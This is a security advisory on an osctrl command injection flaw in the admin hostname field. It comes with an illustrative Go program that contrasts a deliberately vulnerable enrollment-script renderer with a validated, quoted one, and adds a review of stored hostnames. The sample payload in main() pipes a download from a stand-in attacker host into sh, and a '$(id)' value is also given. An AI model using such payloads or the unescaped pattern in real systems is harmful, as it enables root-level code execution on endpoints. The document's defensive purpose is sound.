osctrl OS Command Injection Vulnerability in Admin Environment Configuration Allowing Remote Code Execution
Vulnerability
A command injection vulnerability allowing remote code execution has been identified in osctrl versions prior to 0.5.0. The issue resides in the osctrl-admin environment configuration: an authenticated administrator can inject arbitrary shell commands through the hostname parameter while creating or editing an environment, because the value is embedded unvalidated and unescaped in the enrollment scripts generated for that environment. Those scripts run on every endpoint that enrolls with the compromised environment, as root on Linux and macOS or SYSTEM on Windows, and they run before osquery is installed, so osquery itself produces no record of the injected commands. Exploitation can lead to unauthorized access, credential theft, and complete compromise of the affected endpoints.
Impact
Exploitation of this vulnerability allows for remote code execution on all endpoints that enroll using the compromised environment, with commands executed as root or SYSTEM.
Remediation
Users are advised to upgrade to osctrl version 0.5.0 or later. It is also recommended to restrict osctrl administrator access to trusted personnel, review existing environment configurations for suspicious hostnames, and monitor enrollment scripts for unexpected commands.
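The following Go program is an added illustration of the flaw and of the two remediation steps above (the input check and the review of stored hostnames). It is not osctrl's code: the enrollment script template, the `OSCTRL_HOST` variable, the `/env/secret/enroll` URL shape and all sample values are assumptions made for the example.

```go
package main

import (
	"fmt"
	"regexp"
)

// A hostname is RFC 1123 labels joined by dots, optionally with a port.
// Anything outside this alphabet has no business in an enrollment script.
var hostnameRe = regexp.MustCompile(
	`^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?` +
		`(\.[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*(:[0-9]{1,5})?$`)

// ValidateHostname is the check the vulnerable path lacked: the value flows
// into a shell script, so shell metacharacters must never reach it.
func ValidateHostname(h string) error {
	if len(h) == 0 || len(h) > 253 {
		return fmt.Errorf("hostname length %d out of range", len(h))
	}
	if !hostnameRe.MatchString(h) {
		return fmt.Errorf("hostname %q is not a plain hostname", h)
	}
	return nil
}

// RenderEnrollScriptVulnerable mirrors the flawed pattern: the administrator-
// supplied hostname is interpolated into a shell script verbatim.
// (Hypothetical template, not osctrl's own.)
func RenderEnrollScriptVulnerable(hostname, env, secret string) string {
	return fmt.Sprintf("#!/bin/sh\nOSCTRL_HOST=%s\n"+
		"curl -s https://$OSCTRL_HOST/%s/%s/enroll\n", hostname, env, secret)
}

// RenderEnrollScriptHardened validates first and single-quotes the value, so a
// value that somehow passed a looser validator still cannot end the assignment.
func RenderEnrollScriptHardened(hostname, env, secret string) (string, error) {
	if err := ValidateHostname(hostname); err != nil {
		return "", err
	}
	return fmt.Sprintf("#!/bin/sh\nOSCTRL_HOST='%s'\n"+
		"curl -s \"https://$OSCTRL_HOST/%s/%s/enroll\"\n", hostname, env, secret), nil
}

// SuspiciousHostnames is the post-upgrade review: given the hostnames stored
// in existing environments, return those that fail validation, i.e. candidates
// for a payload planted before the fix.
func SuspiciousHostnames(stored []string) []string {
	var out []string
	for _, h := range stored {
		if ValidateHostname(h) != nil {
			out = append(out, h)
		}
	}
	return out
}

func main() {
	// Constructed sample values; the payload is illustrative, not a real one.
	payload := "osctrl.example.com; curl -s http://attacker.invalid/x | sh #"
	fmt.Print("--- vulnerable ---\n", RenderEnrollScriptVulnerable(payload, "prod", "secret"))

	if _, err := RenderEnrollScriptHardened(payload, "prod", "secret"); err != nil {
		fmt.Println("--- hardened --- rejected:", err)
	}
	ok, _ := RenderEnrollScriptHardened("osctrl.example.com:8443", "prod", "secret")
	fmt.Print(ok)

	fmt.Println("review:", SuspiciousHostnames([]string{"a.example.com", payload, "$(id)"}))
}
```

In the vulnerable rendering the `;` ends the `OSCTRL_HOST=` assignment and the trailing `#` comments out whatever the template put after the hostname, so the injected pipeline runs as the script's user (root or SYSTEM) when the endpoint executes the enrollment script. The hardened path rejects the value outright; the quoting is defence in depth, not a substitute for the allow-list.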
